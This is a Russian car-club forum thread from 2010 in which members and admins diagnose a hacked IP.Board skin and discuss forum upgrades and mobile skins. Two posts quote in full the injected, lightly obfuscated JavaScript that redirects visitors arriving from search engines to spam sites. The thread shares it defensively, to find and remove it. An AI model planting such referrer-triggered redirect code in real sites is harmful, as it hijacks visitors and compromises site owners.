183 ответов в этой теме

[RapteR]

При поиске в гугле так: http://www.google.ru...lient=firefox-a и переходе по ссылке, происходит злобный редирект на какую то неведомую ху... типа "узнай секреты своей фамилии" (http://tvoyarodoslov...1688&subid=3813) - я так понимаю очередная троянская вставка на форуме...

[Mikenat]

При поиске в гугле так: http://www.google.ru...lient=firefox-a и переходе по ссылке, происходит злобный редирект на какую то неведомую ху... типа "узнай секреты своей фамилии" (http://tvoyarodoslov...1688&subid=3813) - я так понимаю очередная троянская вставка на форуме...

У меня нормально - сразу открывает нужную страницу. Какой скин используешь? Кстати - в тестовом режиме обновил форум до версии 3.1.3 (не основной, не пугайтесь) - поиск как был корявый так и остался.

[X-or]

При поиске в гугле так: http://www.google.ru...lient=firefox-a и переходе по ссылке, происходит злобный редирект на какую то неведомую ху... типа "узнай секреты своей фамилии" (http://tvoyarodoslov...1688&subid=3813) - я так понимаю очередная троянская вставка на форуме...

Та же шляпа. Скин IP.Board

[RapteR]

Упрощая задачу:

<a href='[url="view-source:http://www.moskvich-ok.ru/forum/index.php?app=members&section=view&module=list"]http://www.moskvich-ok.ru/forum/index.php?app=members&amp;section=view&amp;module=list[/url]' title='Перейти к списку пользователей'>Пользователи</a></li><if="ipb.member['id'] <= 0"><script>function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('<script language="javascript">docu'+'ment.location="http://tvoyarodoslovnaya.com/?wmid=1688&subid=3813"</s'+'cript>')}else{document.write('.')}}R();</script></if>

Это вот прям шапочка получается. Цимус коня состоит в том, что он срабатывает только при переходе из поисковых систем.

[Mikenat]

RapteR, СПС, нашел, выкусил.

[Mikenat]

Кстати - обратил внимание, всякая кака лезет именно в скин IP.Board. В остальных ее обычно не наблюдается.

[RapteR]

А откуда такая бяка лезет, м? Вставка кода была непосредственно в скине т.е. в базе данных лежала или это где то в файлы закралось?

[Mikenat]

Вставка кода была непосредственно в скине

Да, в globalTemplate

[RapteR]

SQL-инъекция детектед.... Ну и решето же этот IPB... На него хоть обновления выпускают?

[Mikenat]

Ну и решето же этот IPB...

Как и любой другой.

На него хоть обновления выпускают?

Да. Вот сейчас как раз тестирую 3.1.3.

[RapteR]

Я все стесняюсь спросить, что за очередная хрень в коде вылезла:

<if="ipb.member['id']>&lt;= 0"&gt;<script>function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!=-1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('<script language="javascript">docu'+'ment.location="http://carsdeal.ru/?p_id=295"</s'+'cript>')}else{document.write('.')}}R();</script>.</if="ipb.member['id']>

Мало того, что это хрень, так еще и "<= 0">." вылезло после каждого поста...

[Mikenat]

Я все стесняюсь спросить, что за очередная хрень в коде вылезла:

Вырезал.

[X-or]

Вырезал.

может кому-то пароли стали известны для доступа к движку или SQL?

[RapteR]

X-or, судя по характеру вставок, кто то просто юзает эксплоит к очередной дырке IPB.
Вот тут вот на пример прям дословно расписан рецепт как нас нагнули и сколько на этом можно заработать.
А вообще мне плакать хочется от тупизма автора IPB - форум за 7 лет не развился вообще никак, так и не появилась контроля целостности, защиты от SQL инъекций, за то бляхя платны стал шо писец.... За что платить то?! Решето! У меня товарищ, учась в 9-ом классе и то лучше за месяц написал форум, чем они за 8 лет. Позор.

[Mikenat]

может кому-то пароли стали известны для доступа к движку или SQL?

Сомневаюсь. Пароли только недавно поменяли. Далее - все глюки вылазят в СТАНДАРТНОМ скине. В остальных - обычно не встречаются. И последний - сидел именно в стандартном скине.

X-or, судя по характеру вставок, кто то просто юзает эксплоит к очередной дырке IPB.

Вот, тоже склоняюсь к этому. Пока проверяю переход на более новую версию с сохранением всех хуков.

А вообще мне плакать хочется от тупизма автора IPB - форум за 7 лет не развился вообще никак, так и не появилась контроля целостности, защиты от SQL инъекций, за то бляхя платны стал шо писец.... За что платить то?! Решето! У меня товарищ, учась в 9-ом классе и то лучше за месяц написал форум, чем они за 8 лет. Позор.

Согласен. Но другие движки - не менее дырявые... Увы...

[RapteR]

Вопрос первый: кнопка "спасибо" безвозвратно утеряна или просто отвалилась при апдейте и ожидает выхода патча под новую версию форума?Вопрос второй: в этой версии я так понимаю "ло-фай" режим форума упразднился, а вместо него теперь скин IP.Board Mobile?Собственно развивая тему про "людей с ограниченными возможностями" (не инвалидов конечно, а тех кто сидит с мобилок), хочу отметить, что таки да, скин "мобайл" уменьшает трафик примерно в двое - главная страничка вместо 460кб весит всего 213кб (в 2 раза), но понимая что реальной инфы там существенно меньше, мной была обнаружена причина такого веса. Из 213кб, 164кб занимают тупые джаваговноскрипты. Итого 49кб сухой остаток от изначальных 460кб и это еще не предел. Опять же если смотреть на жизнь реально, то этими увесистыми жабаскриптами можно воспользоваться только на приличном КПК с нормальным браузером, а во всяких там "операх мобайл" будет больше тупняков, чем пользы от этой функции.Вопрос три: есть ли еще более облегченные версии для мобилок или стоит на это потратить несколько человеко-недель и сделать его самостоятельно?

Сообщение изменено: RapteR (24 December 2010 - 22:27)

[Mikenat]

Вопрос первый: кнопка "спасибо" безвозвратно утеряна или просто отвалилась при апдейте и ожидает выхода патча под новую версию форума?

Ее нет только в стандартном скине. Спасибо, что сообщил, пофиксим.

Вопрос второй: в этой версии я так понимаю "ло-фай" режим форума упразднился, а вместо него теперь скин IP.Board Mobile?

Я тоже так понял.

Вопрос три: есть ли еще более облегченные версии для мобилок или стоит на это потратить несколько человеко-недель и сделать его самостоятельно?

Возможно есть, я просто не задавался таким вопросом. Считал, что стандартного мобильного скина достаточно.

Ее нет только в стандартном скине. Спасибо, что сообщил, пофиксим.

Исправил

[RapteR]

Я тут обратил внимания что у val`а свежевставленные тэги [mod].[/mod] не отображаются как надо...

[Val]

Глянул пару последних:http://www.moskvich-ok.ru/forum/index.php?showtopic=3460&view=findpost&p=69977http://www.moskvich-ok.ru/forum/index.php?showtopic=3459&view=findpost&p=69976У меня все нормально отображается.

[RapteR]

Val, ты там за капслук кого то ругал, так вот там писалось просто [mod]ататай[/mod], а теперь тэги не видать, но стиль (буква М на красном фоне) пропала. вот на пример:
http://www.moskvich-...indpost&p=14253
http://www.moskvich-...indpost&p=57866
http://www.moskvich-...indpost&p=67575
Да что там, тысячи их - вон гугла всех спалил: http://www.google.ru...kvich-ok.ru mod

[Val]

Свежевставленные тэги - это 27 Май 2010 или 19 Ноябрь 2010 ?Так отображаются тэги поставленные до обновления движка.

[RapteR]

Ну значит мне почудилось, что свежевставленные, просто под новый год никропостеры попросыпались. Ладно, фиг с ними, но старые было бы не плохо пофиксить. Помниться в старые добрые времена в админке была какая то кнопочка типа "починить bb-тэги" или как то так...

[Mikenat]

Так отображаются тэги поставленные до обновления движка.

Угу. До перехода на 3 линейку.

Помниться в старые добрые времена в админке была какая то кнопочка типа "починить bb-тэги" или как то так...

Это сейчас bb-тэги используем, а раньше был отдельный мод.

[RapteR]

Mikenat, ну сами то тэги остались в тексте, так что он должен их обнаружить и поправить - для этого проверялка и была сделана.

[RapteR]

Доставляют меня эти FlashBack`и хостинга. Если уж вырубают, что им облом оставить базу в актуальном состоянии на момент отключения?!Кстати, как мы теперь? На каких условиях?